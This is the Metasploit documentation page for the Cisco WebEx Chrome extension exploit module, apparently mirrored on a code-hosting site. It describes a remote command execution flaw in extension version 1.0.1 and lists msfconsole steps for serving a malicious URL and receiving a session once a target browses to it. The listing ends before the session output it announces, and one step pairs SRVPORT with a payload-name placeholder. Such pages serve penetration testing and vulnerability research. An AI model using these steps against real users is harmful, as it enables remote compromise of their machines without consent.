Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/browser/cisco_webex_ext.md
Views: 11789
Vulnerable Application
Cisco WebEx is a suite of applications for online meeting organization and video conferencing. Included in this suite are extensions for popular web browsers which ease use and provide supplemental features.
Version 1.0.1 of the WebEx extension for Google Chrome contains a vulnerability which allows an attacker to execute arbitrary commands on a target, which can lead to arbitrary remote code execution.
Cisco WebEx Chrome Extension 1.0.1 is known to be affected.
Verification Steps
Start msfconsole
Do:
use exploit/windows/browser/cisco_webex_ext
Do:
set SRVHOST [IP ADDRESS]
Do:
set SRVPORT [PAYLOAD NAME]
Do:
set URIPATH [ARBITRARY URI]
Do:
Choose a payload and set any specific options
Do:
run
, after a target browses to the generated URL, you should receive a session like the following: